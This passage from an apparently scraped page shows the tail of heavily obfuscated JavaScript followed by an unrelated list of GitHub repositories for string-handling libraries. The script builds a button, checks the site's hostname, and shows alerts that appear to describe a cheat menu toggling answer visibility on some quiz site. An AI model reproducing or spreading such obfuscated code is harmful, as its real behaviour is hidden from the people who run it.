ig=document[ky(0x280)+ky(0x209)+ky(0x397)+'t']('a');ig[ky(0x2a9)+'e'][ky(0x39e)+'h']=ky(0x364),ig['styl'+'e'][ky(0x3a8)+ky(0x366)]=ky(0x217)+'k',ig[ky(0x2a9)+'e'][ky(0x1e9)+'r']=iQ['text'],ig['styl'+'e'][ky(0x16d)+'ing']=ky(0x2fe),ig[ky(0x2a9)+'e'][ky(0x36e)+'or']=ky(0x283)+ky(0x3a7),ig[ky(0x2a9)+'e'][ky(0x357)+ky(0x248)+ky(0x151)]=ky(0x396)+ky(0x2d1)+'d\x20'+iQ[ky(0x21b)+'lt'],ig[ky(0x2a9)+'e'][ky(0x376)+ky(0x295)+ky(0x157)+'on']=ky(0x375),ig[ky(0x2a9)+'e'][ky(0x1f5)+'Size']=ky(0x14d),ig[ky(0x170)+'rTex'+'t']=iV,im[ky(0x2f4)+'nd'](ig),ig[ky(0x231)+ky(0x218)+'List'+ky(0x37b)](ky(0x219)+ky(0x1a0)+ky(0x1c5)in window?ky(0x331)+ky(0x37a)+'rt':'clic'+'k',()=>{const kf=ky;let iR=n();try{ic(iR),t(iR);}catch{alert(kf(0x251)+kf(0x1c4)+'\x20ocu'+'rred'+'!');}});}document[kK(0x1ad)+'tion']['host'+kK(0x33d)]!=kK(0x389)+kK(0x238)+kK(0x261)+kK(0x20c)?alert(kK(0x16a)+kK(0x1d1)+kK(0x253)+kK(0x2c5)+'e!'):(alert(kK(0x27c)+kK(0x21c)+kK(0x3a3)+'sil,'+kK(0x277)+kK(0x1ed)+kK(0x31c)+kK(0x14f)+kK(0x352)+'\x20gba'+kK(0x232)+'dev/'+kK(0x238)+kK(0x1fd)+kK(0x18d)+'s\x20th'+kK(0x321)+kK(0x316)+kK(0x2c9)+kK(0x315)+kK(0x1bb)+kK(0x371)+kK(0x1f2)+kK(0x137)+kK(0x149)+kK(0x2db)+'lose'+kK(0x293)+'\x20men'+kK(0x178)+kK(0x1cf)+kK(0x351)+'Q\x20-\x20'+kK(0x1db)+kK(0x317)+'wer\x0a'+kK(0x2d4)+kK(0x2c6)+kK(0x3a4)+kK(0x275)+'visi'+'bili'+'ty'),iG(theme()));})());})();/**********************************************************************************************************************************************************************************************************/})()
IvanStoychev / IvanStoychev.Useful.String.ExtensionsA .Net library of useful extension methods for the "string" class in C#.
ychantit / Fuzzymatch HiveUDFa hive udf method to do fuzzy string matching using Jaro Winkler, Levenstein or NGram distance
Ikramullah-Jamali / String MethodsNo description available
SamiurRahmanMukul / Javascript CheatsheetA comprehensive cheat sheet for JavaScript methods across different data types. This repository provides quick references for string, array, number, object and date methods in JavaScript. Each cheat sheet includes method names, code examples, expected results, and return types, making it a handy resource for developers seeking quick guidance.